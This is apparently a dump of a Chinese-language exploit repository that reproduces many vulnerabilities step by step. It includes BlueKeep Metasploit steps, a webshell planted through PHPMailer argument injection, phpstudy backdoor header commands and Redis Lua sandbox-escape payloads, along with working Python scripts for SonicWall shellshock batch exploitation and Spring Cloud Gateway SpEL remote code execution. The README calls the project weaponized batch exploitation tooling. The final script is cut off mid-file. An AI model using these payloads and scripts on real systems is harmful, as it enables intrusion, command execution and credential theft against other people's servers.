Windows Server 2008(还没尝试,但应该和Windows Server 2008 R2一样) 18 | Windows 7无利用条件 19 | 20 | # 0x04 影响版本 21 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) 22 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 23 | Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 24 | Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) 25 | Windows Server 2008 for x64-based Systems Service Pack 2 26 | Windows Server 2008 for Itanium-Based Systems Service Pack 2 27 | Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 28 | Windows Server 2008 for 32-bit Systems Service Pack 2 29 | Windows 7 for x64-based Systems Service Pack 1 30 | Windows 7 for 32-bit Systems Service Pack 1 31 | 32 | # 0x05 漏洞复现 
33 | 攻击环境:kali_x64_en-us 34 | 35 | 将如下3个文件替换msf中默认的文件 36 | cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/ 37 | cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/(有的文章中给出的目录是/usr/share/metasploit-framework/modules/auxiliary/scanner/,我想应该是少写了rdp/) 38 | cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ 39 | 将如下1个文件添加到msf中 40 | cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/ 41 | 监听meterpreter: 42 | msfconsole 43 | search 0708 44 | use windows/rdp/cve_2019_0708_bluekeep_rce 45 | set RHOSTS 192.168.149.130 46 | run 47 | 选择目标为3(vmware) 48 | 49 | 共尝试了4次: 50 | 第一次没修改注册表,系统蓝屏 51 | 第二次修改注册表后,成功拿到shell 52 | 第三次修改注册表后,系统蓝屏 53 | 第四次修改注册表后,报错Connection reset by peer 54 | 结论,08 r2需要修改注册表,而且利用不稳定 55 | 56 | # 0x06 踩坑记录 57 | 坑0:Exploit aborted due to failure: bad-config: Set the most appropriate target manually 58 | 表示需要设置对应的目标 59 | 坑1:Exploit failed: NameError undefined local variable or method 60 | 需要额外修改三个文件 61 | 坑2:Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer 62 | 未知 63 | 64 | # 0x07 参考链接 65 | https://github.com/rapid7/metasploit-framework/pull/12283 66 | http://blog.xkkhh.cn/archives/535 67 | -------------------------------------------------------------------------------- /Microsoft/Microsoft SharePoint漏洞集合.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-0604 2 | ``` 3 | 工具地址:https://github.com/k8gege/CVE-2019-0604 4 | ``` -------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/document.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/document.docx 
-------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/pic/1.png -------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Microsoft/Microsoft Word远程代码执行漏洞(CVE-2021-40444)/readme.md: -------------------------------------------------------------------------------- 1 | 首先需要关闭Windows Defender(会被查杀) 2 | 3 | Win10_Pro_1703_x64_zh-cn + MS Office 2013 4 | 5 | 执行document.docx两次后会弹出计算器,如下图 6 | ![image](./pic/1.png) 7 | 8 | 参考链接: 9 | https://github.com/lockedbyte/CVE-2021-40444 10 | https://weixin.sogou.com/weixin?type=2&query=CVE-2021-40444&ie=utf8&s_from=input&_sug_=n&_sug_type_= 11 | -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/0.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/1.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/2.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/2.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/3.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/4.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/5.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/a.png -------------------------------------------------------------------------------- /Moeditor/Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- 
/PHPMailer/PHPMailer远程命令执行漏洞(CVE-2016-10033)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPMailer/PHPMailer远程命令执行漏洞(CVE-2016-10033)/0.png

--------------------------------------------------------------------------------
/PHPMailer/PHPMailer远程命令执行漏洞(CVE-2016-10033)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Reproduction environment
Environment used: https://www.mozhe.cn/bug/detail/124

# 0x01 Preconditions
None

# 0x02 Affected versions
PHPMailer<5.2.18

# 0x03 Reproduction
Start the 墨者学院 lab environment; a website appears. Click "Mail Contact" at the bottom, which leads to http://219.153.49.228:49754/mail.php
Enter anything, e.g. "aaa", in the name field, and in the email field enter:
```
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com
```
In the message field enter a one-line webshell:
```

```
Connect with 蚁剑 to http://219.153.49.228:49754/a.php; the webshell works, as shown
![image](./0.png)

# 0x04 Pitfalls
Pitfall 1: after submitting the webshell, the page takes 3-5 minutes to respond

# References
https://www.jianshu.com/p/745c82d8b6e0

--------------------------------------------------------------------------------
/PHPStudy/PHPStudy后门漏洞(暂无编号)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPStudy/PHPStudy后门漏洞(暂无编号)/0.png

--------------------------------------------------------------------------------
/PHPStudy/PHPStudy后门漏洞(暂无编号)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPStudy/PHPStudy后门漏洞(暂无编号)/1.png

--------------------------------------------------------------------------------
/PHPStudy/PHPStudy后门漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software
phpstudy: a popular PHP integrated deployment environment

# 0x01 Reproduction environment
Environment: locally built
Version: phpstudy 2018

# 0x02 Setup
Target: 2008_r2_standard_zh-chs

The backdoor code lives in the \ext\php_xmlrpc.dll module of the php-5.2.17 and php-5.4.45 builds bundled with phpstudy 2016 and phpstudy 2018. Open the file in Notepad and search for "@eval"; if the file contains "@eval(%s('%s'));" the backdoor is present, as shown
![image](./0.png)
Download and install phpstudy 2018, following the prompts

# 0x03 Preconditions
None

# 0x04 Affected versions
php-5.2.17 and php-5.4.45 bundled with phpstudy 2016 and phpstudy 2018

# 0x05 Reproduction
Attack environment: kali_x64_en-us

Capture the request with burp and add the header Accept-Charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
That string is the base64 encoding of "echo system("net user");"; the result is shown below
![image](./1.png)
Note that the request header Accept-Encoding: gzip, deflate has one problem: the space between the comma and deflate must be removed by hand, otherwise the command will not execute

# 0x06 Pitfalls
None

# 0x07 References
None

# Note
I spent a long time finding a vulnerable version, so I am sharing the working ones. The environment is larger than 25MB and cannot be uploaded to github, so it is shared via Baidu Cloud
phpstudy2016, extraction code: ybdt, link: https://pan.baidu.com/s/1-dX55n6xT5hNcBYkxicOBg
phpstudy2018, extraction code: ybdt, link: https://pan.baidu.com/s/1bLX53txLZx4NQAwTsM4BQA

--------------------------------------------------------------------------------
/PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/0.png

--------------------------------------------------------------------------------
/PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/1.png

--------------------------------------------------------------------------------
/PHPUnit/PHPUnit远程代码执行漏洞(CVE-2017-9841)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software
PHPUnit: a commonly used PHP testing framework

# 0x01 Reproduction environment
Environment: vulhub
Version: PHPUnit 5.6.2

# 0x02 Setup
Target: Ubuntu 18.04.5 LTS

cd ./vulhub-master/
cd ./phpunit/
cd ./CVE-2017-9841/
docker-compose build
docker-compose up -d

# 0x03 Preconditions
An affected PHPUnit version installed via composer

# 0x04 Affected versions
4.8.19 <= PHPUnit <= 4.8.27
5.0.10 <= PHPUnit <= 5.6.2

# 0x05 Reproduction
Attack environment: kali_x64_en-us

Visit http://ybdt.best:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Add the following directly to the request body
```

```
As shown
![image](./0.png)
Result
![image](./1.png)

# 0x06 Pitfalls
Pitfall 1:
When building the environment locally the network can be extremely slow; a cloud server is recommended

# 0x07 References
None

--------------------------------------------------------------------------------
/PHP内置服务器/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/PHP内置服务器/01.png

--------------------------------------------------------------------------------
/PHP内置服务器/PHP源码读取漏洞复现.md:
--------------------------------------------------------------------------------
First, my basic understanding of this vulnerability: a source-code disclosure caused by a bug in PHP's built-in web server

Reproduction
Install phpstudy, but do not use nginx or apache as the web server. Change into the php directory and run the following command; I use php 7.4.3 as the example:
```
php.exe -S 0.0.0.0:6677 -n -t C:\phpstudy_pro\WWW
```
Capture the request with burp; two modifications are needed, see: https://www.freebuf.com/vuls/359359.html

Result: reproduction failed

After reading other articles, I guessed the index.html in the web root was the cause. Create a new directory and restart:
```
php.exe -S 0.0.0.0:6677 -n -t C:\phpstudy_pro\WWW\test
```
Resend the request in burp; the source can now be read

Source read successfully
![image](./01.png)

--------------------------------------------------------------------------------
/README.assets/awvs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/README.assets/awvs.png
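The email-field payload in the PHPMailer writeup above works because the sender address reached sendmail with embedded spaces and option-looking tokens. As an added defensive example (not from the page or from PHPMailer), the validator below rejects addresses that could smuggle sendmail arguments and then builds a shell-free argv list; the function names, the address grammar and the sendmail path are assumptions.

```python
import re
from typing import List, NamedTuple, Sequence

# Conservative address grammar (constructed for this example, stricter than
# RFC 5322): a local part of letters, digits and a few punctuation characters,
# then "@", then a hostname. Whitespace, quotes and a leading "-" can never pass.
_ADDR_RE = re.compile(
    r"^[A-Za-z0-9.!#$%&*+/=?^_`{|}~-]+@"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)+$"
)

SENDMAIL = "/usr/sbin/sendmail"   # assumed location of the local MTA binary

# The email-field value from the writeup above, kept here as the negative case.
PAGE_PAYLOAD = '"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com'


class SenderCheck(NamedTuple):
    ok: bool
    reason: str


def check_sender(address: str) -> SenderCheck:
    """Decide whether `address` may be handed to sendmail as the -f sender.

    The CVE-2016-10033 payload smuggles extra sendmail arguments by putting
    spaces and option-looking tokens (-OQueueDirectory=..., -X...) inside the
    address, so those shapes are rejected explicitly before the grammar check.
    """
    if not address:
        return SenderCheck(False, "empty address")
    if any(ch.isspace() for ch in address):
        return SenderCheck(False, "whitespace would split into extra arguments")
    if address.startswith("-"):
        return SenderCheck(False, "address would be parsed as an option")
    if '"' in address or "'" in address or "\\" in address:
        return SenderCheck(False, "quote or backslash in address")
    if not _ADDR_RE.fullmatch(address):
        return SenderCheck(False, "address does not match the allowed grammar")
    return SenderCheck(True, "ok")


def build_sendmail_argv(sender: str, extra: Sequence[str] = ("-t", "-i")) -> List[str]:
    """Build an argv list (no shell involved) with a validated envelope sender.

    Raises ValueError instead of silently passing a malformed address through;
    the caller would hand the list to subprocess.run without shell=True.
    """
    verdict = check_sender(sender)
    if not verdict.ok:
        raise ValueError(f"refusing sender {sender!r}: {verdict.reason}")
    return [SENDMAIL, *extra, "-f", sender]
```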
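The phpstudy backdoor described above is triggered through request headers: Accept-Charset carries base64-encoded PHP that the tampered php_xmlrpc.dll evaluates. As an added detection example (not part of the page), the function below parses raw HTTP request headers, base64-decodes Accept-Charset and flags values that decode to PHP-looking code; the sample requests are constructed, and the exact trigger conditions inside the DLL beyond what the writeup states are not claimed here.

```python
import base64
import binascii
from typing import Dict, Optional

# Tokens that indicate PHP code rather than a charset name (constructed list).
_PHP_MARKERS = ("system(", "eval(", "exec(", "shell_exec(", "passthru(", "<?php", "@eval")

# Constructed requests: one carrying the header from the writeup, one ordinary.
SAMPLE_BACKDOOR_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Accept-Encoding: gzip,deflate\r\n"
    "Accept-Charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7\r\n"
    "\r\n"
)
SAMPLE_NORMAL_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP request (headers only) into a lower-cased name -> value dict."""
    headers: Dict[str, str] = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:   # skip the request line
        if not line.strip():
            break                                             # blank line ends headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def decode_if_base64(value: str) -> Optional[str]:
    """Return the decoded text when `value` is strict base64 of UTF-8 text, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def inspect_request(raw: str) -> Dict[str, object]:
    """Flag a request whose Accept-Charset base64-decodes to PHP code.

    Real charset lists ("utf-8, iso-8859-1;q=0.5") contain characters outside
    the base64 alphabet, so they never decode; a clean decode is itself odd.
    `encoding_trigger` records the no-space "gzip,deflate" form the writeup
    says is required alongside the encoded header.
    """
    headers = parse_headers(raw)
    finding: Dict[str, object] = {
        "suspicious": False,
        "decoded": None,
        "encoding_trigger": headers.get("accept-encoding", "") == "gzip,deflate",
        "reason": "",
    }
    charset = headers.get("accept-charset", "")
    if not charset:
        return finding
    decoded = decode_if_base64(charset)
    if decoded is None:
        return finding
    finding["decoded"] = decoded
    if any(marker in decoded for marker in _PHP_MARKERS):
        finding["suspicious"] = True
        finding["reason"] = "Accept-Charset base64-decodes to PHP code"
    return finding
```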
--------------------------------------------------------------------------------
/README.assets/goby.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/README.assets/goby.png

--------------------------------------------------------------------------------
/README.assets/xray.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/README.assets/xray.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
A long time ago I played an AWD match, which gave me the idea of reproducing every common vulnerability once

# Disclaimer
All POC/EXP in this project are for study and research only and must not be used for malicious attacks!

# V1.0
Vulnerability reproduction + batch detection tools

# V2.0
Vulnerability reproduction + batch detection tools + weaponization + batch exploitation tools

# V3.0
Vulnerability reproduction + batch detection tools + weaponization + batch exploitation tools + vulnerability analysis

--------------------------------------------------------------------------------
/Redis/Redis RCE复现及简单分析(CVE-2022-0543)/pic/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Redis/Redis RCE复现及简单分析(CVE-2022-0543)/pic/01.png

--------------------------------------------------------------------------------
/Redis/Redis RCE复现及简单分析(CVE-2022-0543)/readme.md:
--------------------------------------------------------------------------------
# 0x01 Brief analysis
When Debian and its derivatives package Redis, the Lua sandbox is left with a package object. An attacker can use its loadlib function to load the exported function luaopen_io from the dynamic library liblua5.1.so.0, call it to obtain the io library, and then execute commands through it. The author notes that the path of liblua5.1.so.0 may differ between systems, so check it locally. One complaint: not being able to hit Red Hat-family systems makes this a bit limited...

# 0x02 Preconditions
01 Unauthenticated access, or valid credentials
02 The target runs Debian or a derivative

# 0x03 Reproduction
Build the environment with P牛's vulhub: https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543
The resulting environment is redis 5.0.7 with unauthenticated access
Run the following payloads
```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("uname -a", "r"); local res = f:read("*a"); f:close(); return res' 0
```
![image](./pic/01.png)

# 0x04 References
https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543

--------------------------------------------------------------------------------
/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/0.png

--------------------------------------------------------------------------------
/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/1.png

--------------------------------------------------------------------------------
/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/batch-detect.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/python3

'''
Author: ybdt
Date: 2021/01/27
'''

import sys
import requests


def execute_command(target, command):
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" % (command)}
    try:
        r = requests.get(url=url, headers=headers, verify=False)
    except Exception:
        return ""
    return r.text


def check_exploitable(target):
    # print("(+) Testing %s for pwnability..." % (target))
    output = execute_command(target=target, command="cat /etc/passwd")
    return "root:" in output


def main():
    if len(sys.argv) != 2:
        sys.exit("Usage: python3 batch-detect.py urls.txt")
    file = sys.argv[1]

    with open(file, "r") as f:
        lines = f.readlines()
    for line in lines:
        # strip the trailing newline regardless of platform line endings
        line = line.strip()
        if not line:
            continue
        target = "https://" + line
        is_vulnerable = check_exploitable(target)
        if is_vulnerable:
            print(target + " is vulnerable")
        else:
            print(target + " is not vulnerable")


main()
```

--------------------------------------------------------------------------------
/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software
SonicWall: a VPN solution that includes a web interface, VPN features and more

# 0x01 Reproduction environment
Environment: company lab
Version: SonicWall
Setup:
Omitted

# 0x02 Preconditions
None

# 0x03 Affected versions
SonicWall SSL-VPN < 8.0.0.4

# 0x04 Reproduction
Attack environment: kali x64
Visit the target, capture the request with burp, and change the request path to
```
/cgi-bin/jarrewrite.sh
```
Change the User-Agent to
```
User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd'
```
The command executes, as shown
![image](./0.png)

# 0x05 Batch script
See batch-detect.py (the script is crude: while I was writing it my manager assigned me a pentest and I ran out of time). Its output:
![image](./1.png)

# 0x06 References
https://github.com/darrenmartyn/VisualDoor/blob/main/visualdoor.py

--------------------------------------------------------------------------------
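The Redis payload above is an ordinary EVAL, so it appears verbatim in MONITOR output and in any tooling that parses it. As an added detection example (not from the page or vulhub), the parser below reads MONITOR-format lines, recovers the Lua source of each EVAL or SCRIPT LOAD, and flags scripts that reach names the intended sandbox never exposes; the MONITOR lines are constructed.

```python
import re
from dataclasses import dataclass
from typing import List

# MONITOR line shape: <unix-time> [<db> <client-addr>] "<arg>" "<arg>" ...
_LINE_RE = re.compile(r"^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$")

# Names a script confined to the intended Lua sandbox should never be able to use.
SANDBOX_ESCAPE_MARKERS = ("package.loadlib", "luaopen_io", "io.popen", "os.execute")

# Backslash escapes that MONITOR applies inside quoted arguments.
_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "a": "\a", "b": "\b", '"': '"', "\\": "\\"}

# Constructed MONITOR output: a plain command, a legitimate script and one
# script of the CVE-2022-0543 shape shown in the writeup above.
SAMPLE_MONITOR = (
    '1644400000.101 [0 10.0.0.5:51234] "set" "k" "v"\n'
    '1644400000.202 [0 10.0.0.5:51234] "eval" "return redis.call(\'get\', KEYS[1])" "1" "k"\n'
    '1644400000.303 [0 198.51.100.7:40122] "eval" '
    '"local io_l = package.loadlib(\\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\\", \\"luaopen_io\\"); '
    'local io = io_l(); local f = io.popen(\\"id\\", \\"r\\"); local res = f:read(\\"*a\\"); '
    'f:close(); return res" "0"\n'
)


def split_quoted_args(text: str) -> List[str]:
    """Split the quoted, backslash-escaped argument list that MONITOR prints."""
    args: List[str] = []
    i, n = 0, len(text)
    while i < n:
        if text[i] != '"':            # skip the separators between quoted arguments
            i += 1
            continue
        i += 1                        # consume the opening quote
        buf: List[str] = []
        while i < n and text[i] != '"':
            if text[i] == "\\" and i + 1 < n:
                nxt = text[i + 1]
                if nxt == "x" and i + 3 < n:          # \xHH byte escape
                    buf.append(chr(int(text[i + 2:i + 4], 16)))
                    i += 4
                else:
                    buf.append(_ESCAPES.get(nxt, nxt))
                    i += 2
                continue
            buf.append(text[i])
            i += 1
        args.append("".join(buf))
        i += 1                        # consume the closing quote
    return args


def script_from_args(args: List[str]) -> str:
    """Return the Lua source carried by EVAL or SCRIPT LOAD, or "" for other commands."""
    if not args:
        return ""
    cmd = args[0].lower()
    if cmd == "eval" and len(args) >= 2:
        return args[1]
    if cmd == "script" and len(args) >= 3 and args[1].lower() == "load":
        return args[2]
    return ""


@dataclass
class Finding:
    timestamp: str
    client: str
    markers: List[str]
    script: str


def scan_monitor(text: str) -> List[Finding]:
    """Flag every scripted command in MONITOR output that touches a sandbox-escape name."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        script = script_from_args(split_quoted_args(m.group("args")))
        hits = [marker for marker in SANDBOX_ESCAPE_MARKERS if marker in script]
        if hits:
            findings.append(Finding(m.group("ts"), m.group("client"), hits, script))
    return findings
```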
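The User-Agent used against jarrewrite.sh above is the classic Bash function-definition pattern, so it is easy to spot in access logs. As an added detection example (not the page's batch-detect.py), the function below parses combined-format web server log lines and flags requests to jarrewrite.sh as well as any request whose User-Agent contains the `() {` pattern; the log lines are constructed.

```python
import re
from typing import Dict, List

# Apache/nginx "combined" log format; the sample lines below follow it.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Bash exported-function definition ("() {") anywhere in a header value.
_SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")
TARGET_SCRIPT = "/cgi-bin/jarrewrite.sh"

# Constructed log lines: one exploitation attempt, one normal request, one probe.
SAMPLE_LOG = """\
203.0.113.9 - - [27/Jan/2021:10:15:02 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 512 "-" "() { :; }; echo ; /bin/bash -c 'id'"
198.51.100.4 - - [27/Jan/2021:10:15:09 +0000] "GET /cgi-bin/welcome HTTP/1.1" 200 3120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [27/Jan/2021:10:16:40 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "curl/7.74.0"
"""


def scan_access_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious line, highest severity first within a line.

    A shellshock-style User-Agent is rated high on its own; a bare request to
    jarrewrite.sh is rated medium, since it may only be a scanner probing the path.
    """
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        reasons: List[str] = []
        if _SHELLSHOCK_RE.search(m["ua"]):
            reasons.append("shellshock-style User-Agent")
        if m["path"].split("?", 1)[0].endswith(TARGET_SCRIPT):
            reasons.append("request to jarrewrite.sh")
        if not reasons:
            continue
        findings.append({
            "ip": m["ip"],
            "time": m["time"],
            "path": m["path"],
            "status": int(m["status"]),
            "severity": "high" if reasons[0].startswith("shellshock") else "medium",
            "reasons": reasons,
        })
    return findings
```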
/SonicWall/SonicWall SSL-VPN远程命令执行漏洞(暂无编号)/urls.txt: -------------------------------------------------------------------------------- 1 | www.example.com:8080 2 | 1.1.1.1:8090 3 | -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/cve-2022-22947.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | import requests, json, sys, base64 5 | 6 | 7 | #proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} 8 | 9 | 10 | def rce(url, cmd): 11 | h1 = { 12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', 13 | 'Content-Type': 'application/json' 14 | } 15 | data = { 16 | "id": "ee", 17 | "filters": [{ 18 | "name": "AddResponseHeader", 19 | "args": { 20 | "name": "Result", 21 | "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd +"\").getInputStream()))}" 22 | } 23 | }], 24 | "uri": "http://aaaa.aa", 25 | "order": 0 26 | } 27 | 28 | res1 = requests.post('{}/actuator/gateway/routes/ee'.format(url), data = json.dumps(data, ensure_ascii = False), headers = h1, verify = False)#, proxies = proxies) 29 | res2 = requests.post('{}/actuator/gateway/refresh'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False) 30 | res3 = requests.get('{}/actuator/gateway/routes/ee'.format(url), headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',}, verify = False) 31 | print(res3.text) 32 | 33 | 34 | if __name__ == "__main__": 35 | if len(sys.argv) != 3: 36 | print('使用: python cve-2022-22947.py url cmd') 37 | sys.exit(1) 38 | 39 | url = 
